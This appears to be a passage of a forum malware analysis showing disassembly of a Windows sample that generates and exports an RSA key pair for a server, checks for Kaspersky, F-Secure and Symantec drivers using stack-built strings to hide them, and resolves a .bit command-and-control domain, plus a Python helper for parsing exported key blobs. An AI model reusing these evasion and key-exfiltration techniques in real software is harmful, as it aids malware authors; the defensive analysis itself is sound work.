01AB53DC 8D4B 24 lea ecx, dword ptr [ebx+24]
01AB53DF 83FE 27 cmp esi, 27
01AB53E2 ^ 72 BC jb short 01AB53A0
01AB53E4 8B7424 0C mov esi, dword ptr [esp+C]
01AB53E8 53 push ebx
01AB53E9 56 push esi
01AB53EA FF15 D4B0AB01 call dword ptr [1ABB0D4] ; kernel32.Process32NextW
01AB5411 5D pop ebp
01AB5412 C3 retn
Generating the RSA key pair. The routine acquires a PROV_RSA_FULL (1) context on "Microsoft Enhanced Cryptographic Provider v1.0" with dwFlags = F0000000 (CRYPT_VERIFYCONTEXT); if that fails with 80090016 (NTE_BAD_KEYSET) it retries with dwFlags = 8 (CRYPT_NEWKEYSET). CryptGenKey is then called with Algid = A400 (CALG_RSA_KEYX) and dwFlags = 08000001, i.e. a 2048-bit key (key length in the upper 16 bits) marked CRYPT_EXPORTABLE (bit 0). The key is exported twice with CryptExportKey, blob type 6 (PUBLICKEYBLOB) into the caller's buffer [ebp+8]/[ebp+C] and blob type 7 (PRIVATEKEYBLOB) into [ebp+10]/[ebp+14]; the key handle and context are released and the key container is removed by a final CryptAcquireContextW with dwFlags = 10 (CRYPT_DELETEKEYSET). These two blobs are the key material sent to the server in step 7.
01A26F30 55 push ebp
01A26F31 8BEC mov ebp, esp
01A26F33 83EC 0C sub esp, 0C
01A26F36 68 000000F0 push F0000000 ; dwFlags = CRYPT_VERIFYCONTEXT
01A26F3B 6A 01 push 1
01A26F3D 68 D80DA301 push 1A30DD8 ; UNICODE "Microsoft Enhanced Cryptographic Provider v1.0"
01A26F42 6A 00 push 0
01A26F44 8D45 FC lea eax, dword ptr [ebp-4]
01A26F47 50 push eax
01A26F48 FF15 20B0A201 call dword ptr [1A2B020] ; advapi32.CryptAcquireContextW
01A26F4E 85C0 test eax, eax
01A26F50 75 36 jnz short 01A26F88
01A26F52 FF15 88B1A201 call dword ptr [1A2B188] ; ntdll.RtlGetLastWin32Error
01A26F58 3D 16000980 cmp eax, 80090016
01A26F5D 75 22 jnz short 01A26F81
01A26F5F 6A 08 push 8 ; dwFlags = CRYPT_NEWKEYSET (retry after NTE_BAD_KEYSET)
01A26F61 6A 01 push 1
01A26F63 68 D80DA301 push 1A30DD8 ; UNICODE "Microsoft Enhanced Cryptographic Provider v1.0"
01A26F68 6A 00 push 0
01A26F6A 8D4D FC lea ecx, dword ptr [ebp-4]
01A26F6D 51 push ecx
01A26F6E FF15 20B0A201 call dword ptr [1A2B020] ; advapi32.CryptAcquireContextW
01A26F74 85C0 test eax, eax
01A26F76 75 07 jnz short 01A26F7F
01A26F78 33C0 xor eax, eax
01A26F7A E9 8D000000 jmp 01A2700C
01A26F7F EB 07 jmp short 01A26F88
01A26F81 33C0 xor eax, eax
01A26F83 E9 84000000 jmp 01A2700C
01A26F88 8D55 F8 lea edx, dword ptr [ebp-8]
01A26F8B 52 push edx
01A26F8C 68 01000008 push 8000001 ; dwFlags: 0x0800 << 16 = 2048-bit key | CRYPT_EXPORTABLE
01A26F91 68 00A40000 push 0A400 ; Algid = CALG_RSA_KEYX
01A26F96 8B45 FC mov eax, dword ptr [ebp-4]
01A26F99 50 push eax
01A26F9A FF15 34B0A201 call dword ptr [1A2B034] ; advapi32.CryptGenKey
01A26FA0 85C0 test eax, eax
01A26FA2 75 01 jnz short 01A26FA5
01A26FA4 90 nop
01A26FA5 C745 F4 0000000>mov dword ptr [ebp-C], 0
01A26FAC 8B4D 0C mov ecx, dword ptr [ebp+C]
01A26FAF 51 push ecx
01A26FB0 8B55 08 mov edx, dword ptr [ebp+8]
01A26FB3 52 push edx
01A26FB4 6A 00 push 0
01A26FB6 6A 06 push 6 ; dwBlobType = PUBLICKEYBLOB
01A26FB8 6A 00 push 0
01A26FBA 8B45 F8 mov eax, dword ptr [ebp-8]
01A26FBD 50 push eax
01A26FBE FF15 1CB0A201 call dword ptr [1A2B01C] ; advapi32.CryptExportKey
01A26FC4 8B4D 14 mov ecx, dword ptr [ebp+14]
01A26FC7 51 push ecx
01A26FC8 8B55 10 mov edx, dword ptr [ebp+10]
01A26FCB 52 push edx
01A26FCC 6A 00 push 0
01A26FCE 6A 07 push 7 ; dwBlobType = PRIVATEKEYBLOB
01A26FD0 6A 00 push 0
01A26FD2 8B45 F8 mov eax, dword ptr [ebp-8]
01A26FD5 50 push eax
01A26FD6 FF15 1CB0A201 call dword ptr [1A2B01C] ; advapi32.CryptExportKey
01A26FDC 8B4D F8 mov ecx, dword ptr [ebp-8]
01A26FDF 51 push ecx
01A26FE0 FF15 38B0A201 call dword ptr [1A2B038] ; advapi32.CryptDestroyKey
01A26FE6 6A 00 push 0
01A26FE8 8B55 FC mov edx, dword ptr [ebp-4]
01A26FEB 52 push edx
01A26FEC FF15 28B0A201 call dword ptr [1A2B028] ; advapi32.CryptReleaseContext
01A26FF2 6A 10 push 10 ; dwFlags = CRYPT_DELETEKEYSET
01A26FF4 6A 01 push 1
01A26FF6 68 D80DA301 push 1A30DD8 ; UNICODE "Microsoft Enhanced Cryptographic Provider v1.0"
01A26FFB 6A 00 push 0
01A26FFD 8D45 FC lea eax, dword ptr [ebp-4]
01A27000 50 push eax
01A27001 FF15 20B0A201 call dword ptr [1A2B020] ; advapi32.CryptAcquireContextW
01A27007 B8 01000000 mov eax, 1
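The constants in the listing above decode to a fixed CryptoAPI recipe, and the two CryptExportKey calls produce blobs with a documented layout. The Python below is an example added to this writeup (not code from the sample or the original post): it names the dwFlags values seen in the calls, splits the CryptGenKey flags into key length and CRYPT_EXPORTABLE, and builds and parses a PUBLICKEYBLOB in the exact layout CryptExportKey(hKey, 0, PUBLICKEYBLOB, 0, ...) returns (BLOBHEADER, RSAPUBKEY, little-endian modulus). The sample's real key material is not on this page, so the modulus used is a constructed 2048-bit number, not a key.

```python
import struct

# CryptoAPI constants (wincrypt.h) for the values seen in the listing.
PROV_RSA_FULL       = 1
CRYPT_VERIFYCONTEXT = 0xF0000000
CRYPT_NEWKEYSET     = 0x00000008
CRYPT_DELETEKEYSET  = 0x00000010
NTE_BAD_KEYSET      = 0x80090016
CALG_RSA_KEYX       = 0x0000A400
CRYPT_EXPORTABLE    = 0x00000001
PUBLICKEYBLOB       = 6
PRIVATEKEYBLOB      = 7
CUR_BLOB_VERSION    = 2
RSA1_MAGIC          = 0x31415352   # b"RSA1": public key blob
RSA2_MAGIC          = 0x32415352   # b"RSA2": private key blob (modulus followed by the CRT parameters)

ACQUIRE_FLAG_NAMES = {
    CRYPT_VERIFYCONTEXT: "CRYPT_VERIFYCONTEXT",
    CRYPT_NEWKEYSET: "CRYPT_NEWKEYSET",
    CRYPT_DELETEKEYSET: "CRYPT_DELETEKEYSET",
}


def describe_acquire_flags(flags):
    """Names of the flag bits in a CryptAcquireContextW dwFlags value."""
    return [name for value, name in ACQUIRE_FLAG_NAMES.items() if flags & value == value]


def decode_genkey_flags(flags):
    """CryptGenKey dwFlags: key length in bits in the upper 16 bits, flag bits in the lower 16."""
    return {"bits": flags >> 16, "exportable": bool(flags & CRYPT_EXPORTABLE)}


def build_publickeyblob(modulus, exponent, bitlen):
    """Lay out a PUBLICKEYBLOB as CryptExportKey returns it for an RSA_KEYX key.

    BLOBHEADER {bType, bVersion, reserved, aiKeyAlg}  (8 bytes)
    RSAPUBKEY  {magic, bitlen, pubexp}                (12 bytes)
    modulus, little-endian, bitlen/8 bytes
    """
    header = struct.pack("<BBHI", PUBLICKEYBLOB, CUR_BLOB_VERSION, 0, CALG_RSA_KEYX)
    rsapubkey = struct.pack("<III", RSA1_MAGIC, bitlen, exponent)
    return header + rsapubkey + modulus.to_bytes(bitlen // 8, "little")


def parse_publickeyblob(blob):
    """Parse a PUBLICKEYBLOB back into its fields; raise ValueError on anything else."""
    if len(blob) < 20:
        raise ValueError("blob shorter than BLOBHEADER + RSAPUBKEY")
    btype, bver, _reserved, alg = struct.unpack_from("<BBHI", blob, 0)
    magic, bitlen, pubexp = struct.unpack_from("<III", blob, 8)
    if btype != PUBLICKEYBLOB or bver != CUR_BLOB_VERSION or alg != CALG_RSA_KEYX:
        raise ValueError("not an RSA_KEYX PUBLICKEYBLOB")
    if magic != RSA1_MAGIC:
        raise ValueError("bad RSAPUBKEY magic")
    nlen = bitlen // 8
    if len(blob) != 20 + nlen:
        raise ValueError("modulus length does not match bitlen")
    return {
        "bitlen": bitlen,
        "exponent": pubexp,
        "modulus": int.from_bytes(blob[20:20 + nlen], "little"),
    }


# Constructed stand-in for a 2048-bit modulus: NOT a real key, no primality claimed.
SAMPLE_MODULUS = (1 << 2047) | (0xDEADBEEFCAFEF00D << 512) | 0x0123456789ABCDEF
SAMPLE_BLOB = build_publickeyblob(SAMPLE_MODULUS, 65537, 2048)

if __name__ == "__main__":
    print("first call:", describe_acquire_flags(0xF0000000))
    print("retry:     ", describe_acquire_flags(0x8))
    print("cleanup:   ", describe_acquire_flags(0x10))
    print("CryptGenKey 08000001 ->", decode_genkey_flags(0x08000001))
    print(f"PUBLICKEYBLOB: {len(SAMPLE_BLOB)} bytes, magic {SAMPLE_BLOB[8:12]!r}")
    print(parse_publickeyblob(SAMPLE_BLOB)["bitlen"], "bit key")
```

A 2048-bit public key blob is therefore always 20 + 256 = 276 bytes, and the bytes "RSA1" at offset 8 (or "RSA2" for the private blob) are a handy marker when carving exported keys out of memory dumps or captured C2 traffic.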
Looking for the driver files klif.sys and kl1.sys (Kaspersky), fsdfw.sys (F-Secure), and srtsp.sys, srtsp64.sys, NavEx15.sys and NavEng.sys (Symantec/Norton); if any of them exists the sample exits. The names are assembled on the stack as UTF-16 dwords (660069 = "if", 73002E = ".s", 730079 = "ys", ...) so they do not show up as plain strings in the binary.
01AB2DF6 8D4C24 1C lea ecx, dword ptr [esp+1C]
01AB2DFA C74424 20 6>mov dword ptr [esp+20], 660069
01AB2E02 C74424 24 2>mov dword ptr [esp+24], 73002E
01AB2E0A C74424 28 7>mov dword ptr [esp+28], 730079
01AB2E12 66:894424 2>mov word ptr [esp+2C], ax
01AB2E17 C74424 0C 6>mov dword ptr [esp+C], 6C006B
01AB2E1F C74424 10 3>mov dword ptr [esp+10], 2E0031
01AB2E27 C74424 14 7>mov dword ptr [esp+14], 790073
01AB2E2F C74424 18 7>mov dword ptr [esp+18], 73 ; klif.sys
01AB2E37 E8 C4010000 call 01AB3000
01AB2E3C 85C0 test eax, eax
01AB2E3E 75 59 jnz short 01AB2E99
01AB2E40 8D4C24 0C lea ecx, dword ptr [esp+C] ; kl1.sys
01AB2E44 E8 B7010000 call 01AB3000
01AB2E49 85C0 test eax, eax
01AB2E4B 75 4C jnz short 01AB2E99
01AB2E4D 8D4C24 1C lea ecx, dword ptr [esp+1C]
01AB2E51 C74424 1C 6>mov dword ptr [esp+1C], 730066
01AB2E59 C74424 20 6>mov dword ptr [esp+20], 660064
01AB2E61 C74424 24 7>mov dword ptr [esp+24], 2E0077
01AB2E69 C74424 28 7>mov dword ptr [esp+28], 790073
01AB2E71 C74424 2C 7>mov dword ptr [esp+2C], 73 ; fsdfw.sys
01AB2E79 E8 82010000 call 01AB3000
……
01AB31E3 C745 DC 6E0>mov dword ptr [ebp-24], 67006E
01AB31EA C745 E0 2E0>mov dword ptr [ebp-20], 73002E
01AB31F1 C745 E4 790>mov dword ptr [ebp-1C], 730079
01AB31F8 66:8945 E8 mov word ptr [ebp-18], ax ; srtsp.sys
01AB31FC E8 FFFDFFFF call 01AB3000
……
01AB3208 8D4D BC lea ecx, dword ptr [ebp-44] ; srtsp64.sys
01AB320B E8 F0FDFFFF call 01AB3000
01AB3210 85C0 test eax, eax
01AB3212 75 1C jnz short 01AB3230
01AB3214 8D4D A4 lea ecx, dword ptr [ebp-5C] ; NavEx15.sys
01AB3217 E8 E4FDFFFF call 01AB3000
01AB321C 85C0 test eax, eax
01AB321E 75 10 jnz short 01AB3230
01AB3220 8D4D D4 lea ecx, dword ptr [ebp-2C] ; NavEng.sys
01AB3223 E8 D8FDFFFF call 01AB3000
Spawning nslookup.exe to resolve carder.bit through the name servers ns2.wowservers.ru and ns1.wowservers.ru. The servers were down at the time of analysis, so the lookups did not succeed.
01AB5D31 68 E8030000 push 3E8
01AB5D36 FF15 A0B0AB01 call dword ptr [1ABB0A0] ; kernel32.Sleep
01AB5D3C 6A 04 push 4
01AB5D3E 68 00300000 push 3000
01AB5D43 53 push ebx
01AB5D44 FF15 40B1AB01 call dword ptr [1ABB140] ; kernel32.lstrlenW
Last edited on 2019-9-9 17:47 by 小白鼠_897235